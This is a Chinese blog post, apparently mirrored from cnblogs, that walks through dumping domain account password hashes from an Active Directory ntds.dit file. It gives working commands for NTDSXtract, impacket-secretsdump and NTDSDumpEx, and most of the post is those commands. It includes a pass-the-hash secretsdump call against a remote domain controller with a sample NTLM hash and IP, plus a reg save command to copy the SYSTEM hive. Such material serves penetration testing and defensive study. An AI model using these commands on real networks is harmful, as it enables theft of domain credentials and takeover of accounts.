zoukankan      html  css  js  c++  java
  • 导出ntds.dit中的散列值

    1.下载NTDSX
    安装
    python setup.py build && python setup.py install
    将导出的ntds.dit.export 文件夹中的datatable.3和link_table.5和system.hive文件一并放入ntdsxtract文件夹中,执行如下命令:
    python dsusers.py datatable.3 link_table.5 output --syshive SYSTEM -–passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout | tee all_user.txt
    执行完毕,会将域内用户和散列值导出到all_user.txt中。
    ntds.dit 包含域内所有信息,可以通过分析ntds.dit 导出域内计算机信息,命令如下:
    python dscomputers.py datatable.3 computer_output --csvoutfile all_computers.csv
    域内所有的计算机信息被导出到csv文件中。
     
    2 使用impacket工具包中的secretdump导出散列值
    impacket工具包中的secretdump可以解析ntds.dit并导出所有的用户名和散列值。
    impacket-secretsdump -system system.hive -ntds ntds.dit LOCAL
    impacket 还可以直接通过用户名和散列值进行验证,从远程域控制器中读取ntds.dit 并转储域散列值
    impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 -just-dc PAYLOAD/administrator@192.168.190.130
     
    3 在windows下解析ntds.dit 并导出域账号和域散列值
    使用NTDSDumpex.exe可以进行导出散列值的操作。
    将ntds.dit、NTDSDumpex.exe、system.hive 放在同一目录下,输入如下命令即可导出域账号和散列值。
    NTDSDumpEx.exe下载地址:https://github.com/zcgonvh/NTDSDumpEx
    获取key:reg save HKLMSYSTEM c:windows empSys.hiv
    使用NTDSDumpEx获取所有域用户的Hash
    NTDSDumpEx.exe -d ntds.dit -s system.hive -o hash.txt
     
     
  • 相关阅读:
    ufw防火墙设置
    [从0到1搭建ABP微服务]
    .Net Core CI/CD环境搭建(正式版)
    [Abp vNext微服务实践]
    [Abp vNext微服务实践]
    [Abp vNext微服务实践]
    [Abp vNext微服务实践]
    [Abp vNext微服务实践]
    [Abp vNext微服务实践]
    [Abp vNext微服务实践]
  • 原文地址:https://www.cnblogs.com/micr067/p/12310737.html
Copyright © 2011-2022 走看看